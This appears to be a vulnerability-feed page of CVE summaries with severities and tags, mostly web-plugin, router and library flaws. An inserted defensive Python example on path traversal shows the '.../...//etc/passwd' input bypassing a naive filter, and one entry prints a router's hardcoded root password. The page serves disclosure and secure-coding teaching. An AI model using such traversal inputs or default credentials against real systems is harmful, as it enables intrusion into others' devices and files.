Improper Control of Filename for Include/Require Statement in PHP Program ('PHP Remote File Inclusion') vulnerability in zozothemes Corpkit corpkit allows PHP Local File Inclusion. This issue affects Corpkit: from n/a through <= 2.0. [CVSS 8.1 HIGH]
PHP
Lfi
-
CVE-2025-67919
HIGH
CVSS 8.1
WofficeIO Woffice Core woffice-core is affected by authorization bypass through user-controlled key (CVSS 8.1).
Authentication Bypass
-
CVE-2025-67917
HIGH
CVSS 8.1
Missing Authorization vulnerability in shinetheme Traveler traveler allows Exploiting Incorrectly Configured Access Control Security Levels. This issue affects Traveler: from n/a through <= 3.2.6. [CVSS 8.1 HIGH]
Authentication Bypass
-
CVE-2025-67914
HIGH
CVSS 7.5
Path Traversal: '.../...//' vulnerability in beeteam368 VidMov vidmov allows Path Traversal. This issue affects VidMov: from n/a through <= 2.3.8. [CVSS 7.5 HIGH]
Path Traversal
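The VidMov entry above and the many "PHP Local File Inclusion through improper filename control" theme entries earlier on this page are two faces of one mistake: a request parameter reaches a filesystem path. The '.../...//' notation in the VidMov entry is the tell-tale of a filter that strips "../" in a single pass, which recreates "../" from the leftover characters. The following added example, in Python rather than the themes' PHP and not taken from any of the listed projects, shows that stitching effect, a containment check that canonicalises before comparing, and the allow-list approach that is the right fix for include/require. The base directory and template names are constructed.

```python
import posixpath

TEMPLATE_ROOT = "/var/www/app/templates"      # constructed base directory
# Allow-list for the include/require case: the request names a key, never a path.
ALLOWED_INCLUDES = {
    "header": "partials/header.php",
    "footer": "partials/footer.php",
    "sidebar": "partials/sidebar.php",
}


def naive_strip_traversal(user_path: str) -> str:
    """The flawed filter: one non-recursive pass that deletes '../'.
    '.../...//' survives it as '../' because the deletion stitches the
    leftover characters back together."""
    return user_path.replace("../", "")


def safe_resolve(base: str, user_path: str) -> str:
    """Join, canonicalise, then enforce containment. Returns the canonical
    path or raises ValueError. Uses POSIX semantics so results are identical
    on every host; switch to os.path.realpath when symlinks are in play.
    Absolute user paths are rejected because join() would discard the base."""
    if "\x00" in user_path:
        raise ValueError("NUL byte in path")
    base = posixpath.normpath(base)
    candidate = posixpath.normpath(posixpath.join(base, user_path))
    if candidate != base and not candidate.startswith(base + "/"):
        raise ValueError(f"path escapes base directory: {user_path!r}")
    return candidate


def resolve_include(name: str) -> str:
    """For include/require: map a request parameter to a file through an
    allow-list so the filename itself is never under user control."""
    try:
        return posixpath.join(TEMPLATE_ROOT, ALLOWED_INCLUDES[name])
    except KeyError:
        raise ValueError(f"unknown include: {name!r}") from None
```

Note what the containment check says about the raw '.../...//etc/passwd' input: it is not an escape at all (it names a directory literally called '...'), and it only becomes one after the naive filter rewrites it. Filtering input into shape is the wrong model; canonicalise and compare, or better, never let the input name a file.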
-
CVE-2025-67089
HIGH
CVSS 8.1
A command injection vulnerability exists in the GL-iNet GL-AXT1800 router firmware v4.6.8. The vulnerability is present in the `plugins.install_package` RPC method, which fails to properly sanitize user input in package names. [CVSS 8.1 HIGH]
Command Injection
Gl Axt1800 Firmware
-
CVE-2025-66001
HIGH
CVSS 8.8
NeuVector supports login authentication through OpenID Connect. However, the TLS verification (which verifies the remote server's authenticity and integrity) for OpenID Connect is not enforced by default. [CVSS 8.8 HIGH]
Tls
Suse
-
CVE-2025-65518
HIGH
CVSS 7.5
Plesk Obsidian versions 8.0.1 through 18.0.73 are vulnerable to a Denial of Service (DoS) condition. [CVSS 7.5 HIGH]
PHP
Denial Of Service
Plesk Obsidian
Redhat
-
CVE-2025-63611
HIGH
CVSS 8.7
Cross-Site Scripting in phpgurukul Hostel Management System v2.1 user-provided complaint fields (Explain the Complaint) submitted via /register-complaint.php are stored and rendered unescaped in the admin viewer (/admin/complaint-details.php?cid=<id>). [CVSS 8.7 HIGH]
PHP
XSS
Hostel Management System
-
CVE-2025-56424
HIGH
CVSS 7.5
An issue in Insiders Technologies GmbH e-invoice pro before release 1 Service Pack 2 allows a remote attacker to cause a denial of service via a crafted script. [CVSS 7.5 HIGH]
Denial Of Service
E Invoice Pro
-
CVE-2025-55125
HIGH
CVSS 7.8
This vulnerability allows a Backup or Tape Operator to perform remote code execution (RCE) as root by creating a malicious backup configuration file. [CVSS 7.8 HIGH]
RCE
-
CVE-2025-50334
HIGH
CVSS 7.5
An issue in Technitium DNS Server v.13.5 allows a remote attacker to cause a denial of service via the rate-limiting component. [CVSS 7.5 HIGH]
Dns
Denial Of Service
Dnsserver
Redhat
-
CVE-2025-22715
HIGH
CVSS 8.1
Missing Authorization vulnerability in loopus WP Attractive Donations System - Easy Stripe & Paypal donations WP_AttractiveDonationsSystem allows Exploiting Incorrectly Configured Access Control Security Levels. This issue affects WP Attractive Donations System - Easy Stripe & Paypal donations: from n/a through <= 1.25. [CVSS 8.1 HIGH]
Authentication Bypass
WordPress
PHP
-
CVE-2025-15464
HIGH
CVSS 7.5
Exported Activity allows external applications to gain application context and directly launch Gmail with inbox access, bypassing security controls. [CVSS 7.5 HIGH]
Authentication Bypass
Fun Print
-
CVE-2025-14436
HIGH
CVSS 7.2
The Brevo for WooCommerce plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the ‘user_connection_id’ parameter in all versions up to, and including, 4.0.49 due to insufficient input sanitization and output escaping. [CVSS 7.2 HIGH]
WordPress
XSS
PHP
-
CVE-2025-14025
HIGH
CVSS 8.5
A flaw was found in Ansible Automation Platform (AAP). Read-only scoped OAuth2 API tokens in AAP are enforced at the Gateway level for Gateway-specific operations. [CVSS 8.5 HIGH]
Information Disclosure
Redhat
-
CVE-2019-25291
HIGH
CVSS 7.5
INIM Electronics Smartliving SmartLAN/G/SI <=6.x contains hard-coded credentials in its Linux distribution image that cannot be changed through normal device operations. [CVSS 7.5 HIGH]
Linux
Industrial
-
CVE-2019-25289
HIGH
CVSS 8.8
SmartLiving SmartLAN <=6.x contains an authenticated remote command injection vulnerability in the web.cgi binary through the 'par' POST parameter with the 'testemail' module. [CVSS 8.8 HIGH]
Command Injection
-
CVE-2019-25279
HIGH
CVSS 7.5
Facesentry Access Control System Firmware versions up to 5.7.0 are affected by cleartext storage of sensitive information (CVSS 7.5).
SQLi
Facesentry Access Control System Firmware
-
CVE-2019-25231
HIGH
CVSS 8.4
devolo dLAN Cockpit 4.3.1 contains an unquoted service path vulnerability in the 'DevoloNetworkService' that allows local non-privileged users to potentially execute arbitrary code. [CVSS 8.4 HIGH]
RCE
-
CVE-2017-20215
HIGH
CVSS 8.8
FLIR Thermal Camera FC-S/PT firmware version 8.0.0.64 contains an authenticated OS command injection vulnerability that allows attackers to execute shell commands with root privileges. [CVSS 8.8 HIGH]
Command Injection
-
CVE-2017-20214
HIGH
CVSS 7.5
FLIR Thermal Camera F/FC/PT/D firmware version 8.0.0.64 contains hard-coded SSH credentials that cannot be changed through normal camera operations. Attackers can leverage these persistent, unmodifiable credentials to gain unauthorized remote access to the thermal camera system. [CVSS 7.5 HIGH]
Ssh
-
CVE-2017-20213
HIGH
CVSS 7.5
FLIR Thermal Camera F/FC/PT/D Stream firmware version 8.0.0.64 contains an unauthenticated vulnerability that allows remote attackers to access live camera streams without credentials. [CVSS 7.5 HIGH]
Authentication Bypass
-
CVE-2026-22588
MEDIUM
CVSS 6.5
Spree e-commerce platform versions prior to 4.10.2, 5.0.7, 5.1.9, and 5.2.5 contain an authenticated insecure direct object reference vulnerability allowing logged-in users to access and retrieve address information belonging to other customers by manipulating address identifiers during order modification. Public exploit code exists for this vulnerability, which has been patched in the aforementioned versions.
Ruby
Spree
-
CVE-2026-22587
MEDIUM
CVSS 5.5
Ideagen DevonWay is vulnerable to stored cross-site scripting in the Reports page, allowing authenticated attackers to inject malicious scripts that execute when other users view affected reports. This vulnerability impacts all users with access to DevonWay reports and enables session hijacking, credential theft, or malware distribution. Versions 2.62.4 and 2.62 LTS are noted as fixed versions.
XSS
-
CVE-2026-22522
MEDIUM
CVSS 6.5
Munir Kamal Block Slider through version 2.2.3 fails to properly enforce access control, allowing authenticated users to access sensitive information they should not have permission to view. An attacker with valid credentials could exploit this missing authorization check to read confidential data. No patch is currently available for this vulnerability.
Authentication Bypass
-
CVE-2026-22519
MEDIUM
CVSS 6.5
Stored cross-site scripting in BuddyDev MediaPress through version 1.6.2 enables authenticated attackers to inject malicious scripts that execute in other users' browsers, potentially compromising session data or performing unauthorized actions. The vulnerability requires user interaction and affects the confidentiality, integrity, and availability of affected installations. No patch is currently available.
XSS
-
CVE-2026-22518
MEDIUM
CVSS 6.5
DOM-based cross-site scripting in pencilwp X Addons for Elementor through version 1.0.23 allows authenticated attackers to inject malicious scripts that execute in users' browsers with user interaction. An attacker with login credentials can exploit this vulnerability to steal session tokens, deface content, or perform actions on behalf of affected users. No patch is currently available for this vulnerability.
XSS
-
CVE-2026-22517
MEDIUM
CVSS 5.4
Improper access control in GA4WP: Google Analytics for WordPress versions up to 2.10.0 allows authenticated users to modify or disable analytics functionality through misconfigured permissions. An attacker with low-privilege WordPress access could leverage this vulnerability to manipulate analytics data or disrupt monitoring capabilities. The vulnerability carries a MEDIUM severity rating with no patch currently available.
WordPress
Industrial
-
CVE-2026-22492
MEDIUM
CVSS 4.3
Docket Cache versions through 24.07.04 contain an access control bypass that allows authenticated users to perform unauthorized actions due to improper permission validation. An attacker with valid credentials can exploit this vulnerability to cause denial of service or access restricted functionality. No patch is currently available.
Authentication Bypass
-
CVE-2026-22490
MEDIUM
CVSS 5.4
Improper access control in the Bulk Landing Page Creator for WordPress (LPagery) plugin versions through 2.4.9 allows authenticated users to modify or delete landing pages without proper authorization checks. An attacker with low-privilege WordPress access could exploit this to tamper with site content or disrupt operations. No patch is currently available.
WordPress
-
CVE-2026-22489
MEDIUM
CVSS 4.3
Wptexture Image Slider Slideshow versions through 1.8 contain an authorization bypass flaw that allows authenticated users to modify content by manipulating access control parameters. An attacker with user-level access could exploit incorrectly configured security controls to perform unauthorized actions beyond their assigned privileges. No patch is currently available for this vulnerability.
Authentication Bypass
-
CVE-2026-22488
MEDIUM
CVSS 5.3
Inadequate access control in IdeaBox Creations Dashboard Welcome for Beaver Builder (versions through 1.0.8) permits unauthorized users to modify data without proper authentication. An unauthenticated attacker can exploit misconfigured security levels to perform unauthorized actions over the network with no user interaction required. No patch is currently available to address this vulnerability.
Authentication Bypass
-
CVE-2026-22487
MEDIUM
CVSS 4.3
Baqend Speed Kit versions through 2.0.2 contain an authorization bypass that allows authenticated users to modify data by exploiting misconfigured access control levels. An attacker with valid credentials could escalate privileges to alter information they should not have permission to change. No patch is currently available.
Authentication Bypass
-
CVE-2026-22486
MEDIUM
CVSS 5.3
The Hakob Re Gallery & Responsive Photo Gallery Plugin through version 1.17.18 contains an authorization bypass that permits unauthenticated attackers to modify gallery content due to improperly enforced access controls. This vulnerability affects all installations of the plugin and could allow attackers to alter or deface photo galleries without authentication. No patch is currently available.
Authentication Bypass
-
CVE-2026-22253
MEDIUM
CVSS 5.4
Soft Serve versions prior to 0.11.2 contain an authorization bypass in the LFS lock deletion endpoint that allows authenticated users to forcibly delete locks owned by other users by exploiting improper validation order. Any user with repository write access can leverage this vulnerability to disrupt collaborative workflows by removing locks created by teammates. A public exploit exists and patches are available.
Authentication Bypass
Soft Serve
Suse
-
CVE-2026-22246
MEDIUM
CVSS 6.5
Mastodon versions prior to 4.3.17, 4.4.11, and 4.5.4 fail to validate ownership when retrieving severed relationship lists, allowing any authenticated user to enumerate all lost followers and followed accounts across all severance events. This information disclosure vulnerability affects multi-user Mastodon instances where relationship changes due to moderation actions are visible to unauthorized users. An attacker with a local account can systematically access relationship data they should not have permission to view.
Golang
Mastodon
-
CVE-2026-22242
MEDIUM
CVSS 4.9
Blind SQL injection in CoreShop prior to version 4.1.8 allows authenticated administrators to extract sensitive database information through boolean-based or time-based attack techniques. The vulnerability is limited to information disclosure due to the application's read-only database permissions, preventing data modification or denial of service. Public exploit code exists for this vulnerability; administrators should upgrade to version 4.1.8 or later.
SQLi
Coreshop
-
CVE-2026-22233
MEDIUM
CVSS 5.5
Stored cross-site scripting in OPEXUS eCASE Audit enables authenticated users to inject malicious JavaScript through the "Estimated Staff Hours" comment field, which executes when other users access the Project Cost tab. This allows attackers with valid credentials to compromise other users' sessions and perform unauthorized actions within the application. No patch is currently available for this vulnerability.
XSS
Ecase Audit
-
CVE-2026-22232
MEDIUM
CVSS 5.5
Stored cross-site scripting in OPEXUS eCASE Audit's Project Setup functionality allows authenticated users to inject malicious JavaScript into the "A or SIC Number" field that executes in other users' browsers when they view the project. An attacker with valid credentials can exploit this to steal session tokens, perform unauthorized actions, or compromise data for all project viewers. No patch is currently available.
XSS
Ecase Audit
-
CVE-2026-22231
MEDIUM
CVSS 5.5
OPEXUS eCASE Audit's Document Check Out feature contains a stored cross-site scripting vulnerability that allows authenticated users to inject malicious JavaScript into comments, which executes in the browsers of other users viewing the Action History Log. This could enable attackers with valid credentials to steal session tokens, perform unauthorized actions, or compromise other users' accounts. No patch is currently available for affected installations.
XSS
Ecase Audit
-
CVE-2026-22041
MEDIUM
CVSS 5.3
Logging Redactor prior to version 0.0.6 fails to properly handle non-string data types during redaction operations, causing type conversion errors that can disrupt log formatting and integrity checks. Public exploit code exists for this vulnerability, allowing attackers to craft inputs that bypass the redaction mechanism or cause denial of service through malformed log output. Users of Logging Redactor should upgrade to version 0.0.6 or later, as no patch is currently available for affected earlier versions.
Python
Logging Redactor
-
CVE-2026-22032
MEDIUM
CVSS 4.3
Directus versions prior to 11.14.0 contain an open redirect vulnerability in the SAML authentication callback that allows unauthenticated attackers to redirect users to arbitrary external URLs by manipulating the RelayState parameter. The validation checks present during login initiation are not applied to the callback endpoint, enabling phishing and credential theft attacks. A patch is available in version 11.14.0 and later.
Open Redirect
Directus
-
CVE-2026-22028
MEDIUM
CVSS 6.1
HTML injection in Preact and React through unsafe JSON deserialization allows remote attackers to inject arbitrary scripts when applications pass unsanitized user-controlled data as component children, with public exploit code already available. The vulnerability stems from a regression in Preact 10.26.5 that weakened protections against constructing Virtual DOM elements from malicious JSON payloads. Affected applications are vulnerable if they consume unvalidated external data without sanitization and lack additional mitigations like Content Security Policy.
React
Preact
Redhat
Suse
-
CVE-2026-21896
MEDIUM
CVSS 5.7
Kirby CMS versions 5.0.0-5.2.1 fail to enforce permission checks in the content changes API, allowing authenticated users with restricted roles to modify site content despite having update permissions disabled. This affects only installations with custom permission configurations designed to prevent write access for specific user roles. A patch is available in version 5.2.2.
Authentication Bypass
Kirby
-
CVE-2026-21895
MEDIUM
CVSS 5.3
The RSA crate versions prior to 0.9.10 crash when constructing private keys with invalid prime components (such as 1), allowing an attacker to trigger a denial of service by providing malformed key material. This affects applications using the vulnerable RSA library for cryptographic operations. A patch is available in version 0.9.10 and later.
Industrial
Rsa
Redhat
Suse
-
CVE-2026-21894
MEDIUM
CVSS 6.5
n8n versions 0.150.0 through 2.2.1 lack webhook signature verification in the Stripe Trigger node, enabling unauthenticated attackers to forge Stripe events and trigger workflows by sending crafted POST requests to known webhook URLs. Affected users with active Stripe Trigger workflows could experience unauthorized execution of automation logic, potentially allowing attackers to simulate fraudulent payment or subscription events. A patch is available in version 2.2.2 and later.
Authentication Bypass
N8n
-
CVE-2026-21892
MEDIUM
CVSS 5.3
SQL injection in Parsl's visualization dashboard allows unauthenticated attackers to execute arbitrary database queries through unsafe string formatting of the workflow_id parameter. Public exploit code exists for this vulnerability, enabling potential data theft or database denial of service attacks against the monitoring infrastructure. The issue affects Parsl versions prior to 2026.01.05, which includes the fix.
Python
SQLi
Denial Of Service
Parsl
-
CVE-2026-21885
MEDIUM
CVSS 6.5
Miniflux's media proxy endpoint is vulnerable to Server-Side Request Forgery (SSRF) in versions prior to 2.2.16, allowing authenticated users to craft malicious proxy URLs that force the application to fetch and expose responses from internal network resources including localhost and private IP ranges. An attacker with valid credentials can abuse this to access sensitive internal services and metadata endpoints by embedding specially crafted URLs in feed content. Public exploit code exists for this vulnerability, and no patch is currently available for affected installations.
SSRF
Miniflux
Suse
-
CVE-2026-21883
MEDIUM
CVSS 5.4
Bokeh versions 3.8.1 and below allow attackers to bypass Origin validation in WebSocket connections by registering domains that suffix-match allowlisted domains (e.g., dashboard.corp.attacker.com for allowlist entry dashboard.corp), enabling unauthorized server interaction. Public exploit code exists for this vulnerability, which could allow attackers to access sensitive data or modify visualizations on behalf of victims. The issue is resolved in Bokeh 3.8.2.
Python
Bokeh
Redhat
Suse
-
CVE-2026-21880
MEDIUM
CVSS 5.3
Kanboard versions 1.2.48 and earlier contain an LDAP injection vulnerability where unsanitized user input in the LDAP authentication mechanism allows attackers to enumerate users, extract sensitive attributes, and target specific accounts. Public exploit code exists for this vulnerability. The issue is resolved in version 1.2.49 and later.
Ldap
Kanboard
-
CVE-2026-21879
MEDIUM
CVSS 4.7
Open redirect vulnerability in Kanboard versions 1.2.48 and below allows attackers to bypass URL validation and redirect authenticated users to malicious websites through specially crafted URLs. Public exploit code exists for this vulnerability, which can be leveraged for phishing attacks and credential theft. The vulnerability is resolved in version 1.2.49.
Open Redirect
Kanboard
-
CVE-2026-21874
MEDIUM
CVSS 5.3
NiceGUI versions 2.10.0 through 3.4.1 fail to properly release Redis connections when users open and close browser tabs, allowing unauthenticated attackers to exhaust the Redis connection pool and degrade service functionality. An attacker can repeatedly trigger connection leaks without authentication, causing storage errors and degraded performance once connection limits are reached. Public exploit code exists for this vulnerability, which is patched in version 3.5.0.
Python
Redis
Nicegui
-
CVE-2026-21872
MEDIUM
CVSS 6.1
NiceGUI versions 2.22.0 through 3.4.1 contain a stored cross-site scripting vulnerability in the click event listener of ui.sub_pages that executes attacker-controlled JavaScript when users click malicious links on the page. Public exploit code exists for this vulnerability, and affected users should upgrade to version 3.5.0 or later immediately. The vulnerability requires user interaction but can impact confidentiality and integrity with network-accessible exploitation.
Python
XSS
Nicegui
-
CVE-2026-21871
MEDIUM
CVSS 6.1
Cross-site scripting (XSS) in NiceGUI versions 2.13.0 through 3.4.1 allows attackers to execute arbitrary JavaScript in users' browsers when applications pass untrusted input to the ui.navigate.history.push() or ui.navigate.history.replace() functions due to improper string escaping in generated JavaScript. Public exploit code exists for this vulnerability, and developers using affected versions should upgrade to 3.5.0 or later, or avoid passing user-controlled data to these navigation helpers. Applications that only use these functions with trusted, hardcoded URLs are unaffected.
Python
XSS
Nicegui
-
CVE-2026-21860
MEDIUM
CVSS 5.3
Werkzeug versions prior to 3.1.5 fail to properly validate Windows reserved device names in the safe_join function, allowing attackers to bypass path restrictions by using device names with file extensions or trailing spaces (e.g., CON.txt, AUX ). This denial of service vulnerability affects Windows systems running vulnerable Werkzeug versions and could allow an unauthenticated remote attacker to access restricted files or cause application crashes. A patch is available in version 3.1.5 and later.
Windows
Werkzeug
Suse
-
CVE-2026-21859
MEDIUM
CVSS 5.8
Mailpit versions 1.28.0 and earlier contain a server-side request forgery vulnerability in the /proxy endpoint that permits unauthenticated attackers to probe and access internal network resources and services. The endpoint insufficiently validates destination addresses, allowing requests to internal IP ranges despite scheme validation. Public exploit code exists for this vulnerability, which is resolved in version 1.28.1.
SSRF
Mailpit
Suse
-
CVE-2026-21695
MEDIUM
CVSS 4.3
Titra time tracking software versions 0.99.49 and below contain a mass assignment vulnerability in their API that allows authenticated users to inject arbitrary fields into time entries through an unvalidated customfields parameter, enabling attackers to overwrite protected data such as user IDs, hours, and entry states. Public exploit code exists for this vulnerability which affects the integrity of tracked time data. The issue is resolved in version 0.99.50.
Code Injection
Titra
-
CVE-2026-21694
MEDIUM
CVSS 6.8
Unauthorized access control in Titra versions 0.99.49 and earlier enables authenticated users to view and modify time entries belonging to other users in private projects without proper authorization. Public exploit code exists for this vulnerability, affecting deployments that have not upgraded to version 0.99.50. The flaw allows authenticated attackers to compromise data integrity and confidentiality of other users' tracked time information.
Authentication Bypass
Titra
-
CVE-2026-21639
MEDIUM
CVSS 5.4
Remote code execution in Ubiquiti airMAX and airFiber wireless products allows adjacent attackers to execute arbitrary code on affected devices via a flaw in the airMAX Wireless Protocol without requiring authentication. Vulnerable versions include airMAX AC 8.7.20 and earlier, airMAX M 6.3.22 and earlier, airFiber AF60-XG 1.2.2 and earlier, and airFiber AF60 2.6.7 and earlier. Patches are available for all affected products.
RCE
Airmax Ac Firmware
Airfiber Af60 Firmware
Airfiber Af60 Xg Firmware
Airmax M Firmware
-
CVE-2026-0731
MEDIUM
CVSS 5.3
A null pointer dereference in TOTOLINK WA1200 5.9c.2914's HTTP request handler (cstecgi.cgi) allows remote unauthenticated attackers to trigger a denial of service condition. Public exploit code is available for this vulnerability, increasing the risk of active exploitation. A patch is not currently available, leaving affected devices vulnerable until an update is released.
Null Pointer Dereference
Wa1200 Poe
Wa1200 Poe Firmware
-
CVE-2026-0729
MEDIUM
CVSS 4.7
SQL injection in the Intern Membership Management System 1.0 add_activity.php file allows authenticated administrators to manipulate the Title parameter and execute arbitrary database queries. Public exploit code exists for this vulnerability, and no patch is currently available. The flaw enables an authenticated attacker with high privileges to compromise data confidentiality and integrity.
PHP
SQLi
Intern Membership Management System
-
CVE-2026-0728
MEDIUM
CVSS 4.7
SQL injection in the Intern Membership Management System 1.0 admin deletion function allows authenticated attackers with high privileges to manipulate the admin_id parameter and execute arbitrary database queries remotely. Public exploit code is available for this vulnerability, which affects PHP-based deployments. The vulnerability enables unauthorized data access, modification, and potential denial of service with no patch currently available.
PHP
SQLi
Intern Membership Management System
-
CVE-2026-0707
MEDIUM
CVSS 5.3
Keycloak's Authorization header parser improperly tolerates non-RFC 6750 compliant formatting, including tabs and case variations in Bearer token authentication. This lax validation could enable attackers to bypass authentication mechanisms or manipulate token validation logic in applications relying on strict Bearer token parsing. No patch is currently available for this medium-severity vulnerability.
Information Disclosure
Redhat
-
CVE-2026-0701
MEDIUM
CVSS 4.7
SQL injection in the admin panel of code-projects Intern Membership Management System 1.0 allows authenticated attackers with high privileges to manipulate the Username parameter in /intern/admin/add_admin.php and execute arbitrary database queries. Public exploit code exists for this vulnerability, and no patch is currently available. Affected organizations should restrict administrative access and consider implementing input validation controls or upgrading to a patched version when available.
PHP
SQLi
Intern Membership Management System
-
CVE-2026-0699
MEDIUM
CVSS 4.7
SQL injection in the Intern Membership Management System 1.0 admin panel allows authenticated attackers with high privileges to manipulate the activity_id parameter in edit_activity.php, potentially leading to unauthorized data access, modification, or deletion. Public exploit code exists for this vulnerability, though no patch is currently available.
PHP
SQLi
Intern Membership Management System
-
CVE-2026-0698
MEDIUM
CVSS 4.7
SQL injection in the Intern Membership Management System 1.0 admin panel allows authenticated attackers with high privileges to manipulate the admin_id parameter in /intern/admin/edit_students.php and execute arbitrary database queries. Public exploit code exists for this vulnerability, enabling attackers to read, modify, or delete sensitive data. No patch is currently available to remediate this issue.
PHP
SQLi
Intern Membership Management System
-
CVE-2026-0697
MEDIUM
CVSS 4.7
SQL injection in the Intern Membership Management System 1.0 admin panel allows remote attackers with high privileges to manipulate the admin_id parameter in /intern/admin/edit_admin.php, potentially enabling unauthorized data access or modification. Public exploit code exists for this vulnerability, and no patch is currently available.
PHP
SQLi
Intern Membership Management System
-
CVE-2026-0676
MEDIUM
CVSS 5.3
G5Theme Zorka versions up to 1.5.7 contain a missing authorization vulnerability that allows unauthenticated remote attackers to modify data through incorrectly configured access controls. An attacker can exploit this to perform unauthorized state-changing operations without proper authentication or user interaction. No patch is currently available for this vulnerability.
Authentication Bypass
-
CVE-2026-0674
MEDIUM
CVSS 4.3
Campaign Monitor Campaign Monitor for WordPress forms-for-campaign-monitor is affected by missing authorization (CVSS 4.3).
WordPress
-
CVE-2026-0671
MEDIUM
CVSS 6.1
Mediawiki-Extensions-Uploadwizard versions up to 1.39 are affected by cross-site scripting (XSS) (CVSS 6.1).
Mediawiki
XSS
Mediawiki Extensions Uploadwizard
-
CVE-2025-69169
MEDIUM
CVSS 5.4
Improper Neutralization of Script-Related HTML Tags in a Web Page (Basic XSS) vulnerability in Noor Alam Easy Media Download easy-media-download allows Reflection Injection. This issue affects Easy Media Download: from n/a through <= 1.1.11. [CVSS 5.4 MEDIUM]
XSS
-
CVE-2025-68892
MEDIUM
CVSS 6.1
Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in gopiplus@hotmail.com Scroll rss excerpt scroll-rss-excerpt allows Reflected XSS. This issue affects Scroll rss excerpt: from n/a through <= 5.0. [CVSS 6.1 MEDIUM]
XSS
-
CVE-2025-68890
MEDIUM
CVSS 6.1
Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in hands01 e-shops e-shops-cart2 allows DOM-Based XSS. This issue affects e-shops: from n/a through <= 1.0.4. [CVSS 6.1 MEDIUM]
XSS
-
CVE-2025-68875
MEDIUM
CVSS 5.4
jcaruso001 Flaming Password Reset flaming-password-reset is affected by cross-site scripting (xss) (CVSS 5.4).
XSS
-
CVE-2025-68867
MEDIUM
CVSS 6.5
Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in anibalwainstein Effect Maker effect-maker allows DOM-Based XSS. This issue affects Effect Maker: from n/a through <= 1.2.1. [CVSS 6.5 MEDIUM]
XSS
-
CVE-2025-68718
MEDIUM
CVSS 5.4
KAYSUS KS-WR1200 routers with firmware 107 expose SSH and TELNET services on the LAN interface with hardcoded root credentials (root:12345678). The administrator cannot disable these services or change the hardcoded password. [CVSS 5.4 MEDIUM]
Ssh
Ks Wr1200 Firmware
-
CVE-2025-68158
MEDIUM
CVSS 5.7
Authlib is a Python library which builds OAuth and OpenID Connect servers. [CVSS 5.7 MEDIUM]
Python
CSRF
Redhat
Suse
-
CVE-2025-67933
MEDIUM
CVSS 6.1
Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in taskbuilder Taskbuilder taskbuilder allows Reflected XSS. This issue affects Taskbuilder: from n/a through <= 4.0.9. [CVSS 6.1 MEDIUM]
XSS
-
CVE-2025-67932
MEDIUM
CVSS 6.1
Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in purethemes Listeo Core listeo-core allows Reflected XSS. This issue affects Listeo Core: from n/a through < 2.0.19. [CVSS 6.1 MEDIUM]
XSS
-
CVE-2025-67930
MEDIUM
CVSS 6.1
Vernon Systems Limited eHive Search ehive-search is affected by cross-site scripting (XSS) (CVSS 6.1).
XSS
-
CVE-2025-67927
MEDIUM
CVSS 6.1
Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Spencer Haws Link Whisper Free link-whisper allows Reflected XSS. This issue affects Link Whisper Free: from n/a through <= 0.8.8. [CVSS 6.1 MEDIUM]
Aws
XSS
-
CVE-2025-67922
MEDIUM
CVSS 6.1
Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in ThemeGoods Grand Restaurant grandrestaurant allows Reflected XSS. This issue affects Grand Restaurant: from n/a through < 7.0.9. [CVSS 6.1 MEDIUM]
XSS
Grand Restaurant
-
CVE-2025-67918
MEDIUM
CVSS 6.1
Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in WofficeIO Woffice woffice allows Reflected XSS. This issue affects Woffice: from n/a through <= 5.4.30. [CVSS 6.1 MEDIUM]
XSS
-
CVE-2025-67916
MEDIUM
CVSS 6.1
Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Astoundify Jobify jobify allows Reflected XSS. This issue affects Jobify: from n/a through <= 4.3.0. [CVSS 6.1 MEDIUM]
XSS
-
CVE-2025-67825
MEDIUM
CVSS 5.5
An issue was discovered in Nitro PDF Pro for Windows before 14.42.0.34. In certain cases, it displays signer information from a non-verified PDF field rather than from the verified certificate subject. [CVSS 5.5 MEDIUM]
Windows
Nitro Pdf Pro
-
CVE-2025-67091
MEDIUM
CVSS 6.5
Ax1800 Firmware versions up to 4.2.0 are affected by improper restriction of excessive authentication attempts (CVSS 6.5).
Authentication Bypass
Ax1800 Firmware
-
CVE-2025-67090
MEDIUM
CVSS 5.1
Ax1800 Firmware versions up to 4.2.0 are affected by improper restriction of excessive authentication attempts (CVSS 5.1).
Authentication Bypass
Ax1800 Firmware
-
CVE-2025-65731
MEDIUM
CVSS 6.8
Dir-605L Firmware versions up to 6.02cn02 are affected by missing authentication for critical function (CVSS 6.8).
D-Link
Dir 605l Firmware
-
CVE-2025-61550
MEDIUM
CVSS 5.4
Cross-Site Scripting (XSS) is present on the ctl00_Content01_fieldValue parameters on the /psp/appNet/TemplateOrder/TemplatePreview.aspx endpoint in edu Business Solutions Print Shop Pro WebDesk version 18.34 (fixed in 19.69). [CVSS 5.4 MEDIUM]
XSS
Print Shop Pro Webdesk
-
CVE-2025-61549
MEDIUM
CVSS 6.1
Cross-Site Scripting (XSS) is present on the LoginID parameter on the /PSP/app/web/reg/reg_display.asp endpoint in edu Business Solutions Print Shop Pro WebDesk version 18.34 (fixed in 19.76). Unsanitized user input is reflected in HTTP responses without proper HTML encoding or escaping. [CVSS 6.1 MEDIUM]
XSS
Print Shop Pro Webdesk
-
CVE-2025-61547
MEDIUM
CVSS 6.8
Print Shop Pro Webdesk versions up to 18.34 are affected by cross-site request forgery (CSRF) (CVSS 6.8).
CSRF
Print Shop Pro Webdesk
-
CVE-2025-27004
MEDIUM
CVSS 6.1
LambertGroup Famous - Responsive Image And Video Grid Gallery WordPress Plugin famous_grid_image_and_video_gallery is affected by cross-site scripting (XSS) (CVSS 6.1).
WordPress
XSS
PHP
-
CVE-2025-27002
MEDIUM
CVSS 6.1
LambertGroup CountDown With Image or Video Background countdown-with-background is affected by cross-site scripting (XSS) (CVSS 6.1).
XSS
-
CVE-2025-22725
MEDIUM
CVSS 5.4
Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in loopus WP Virtual Assistant VirtualAssistant allows Stored XSS. This issue affects WP Virtual Assistant: from n/a through <= 3.0. [CVSS 5.4 MEDIUM]
XSS
-
